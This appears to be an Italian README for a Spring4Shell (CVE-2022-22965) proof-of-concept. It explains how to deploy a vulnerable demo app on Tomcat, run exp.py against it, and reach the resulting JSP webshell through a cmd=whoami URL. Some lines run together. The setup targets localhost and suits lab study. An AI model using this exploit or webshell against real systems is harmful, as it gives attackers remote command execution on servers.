
Proof-of-concept exploit per Spring4Shell (CVE-2022-22965) che distribuisce una webshell JSP tramite richieste HTTP manipolate a applicazioni Spring Boot vulnerabili su Apache Tomcat.
Descrizione della vulnerabilità: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
Costruzione del POC: https://github.com/BobTheShoplifter/Spring4Shell-POC
Testato con JDK 11.0.14, Spring Boot 2.6.5 e Apache Tomcat 9.0.60
mvn clean package per compilare l'applicazionedemo-0.0.1-SNAPSHOT.war in spring-poc.war e copia questo file .war nella directory webapps di Tomcatpython exp.py --url http://localhost:8080/spring-poc/greeting
漏洞存在,shell地址为:http://localhost:8080/spring-poc/tomcatwar.jsp?pwd=j&cmd=whoami.tomcatwar.jsp scritto nella directory webapps/spring-poc di Tomcat. Questa directory può essere modificata modificando exp.py.

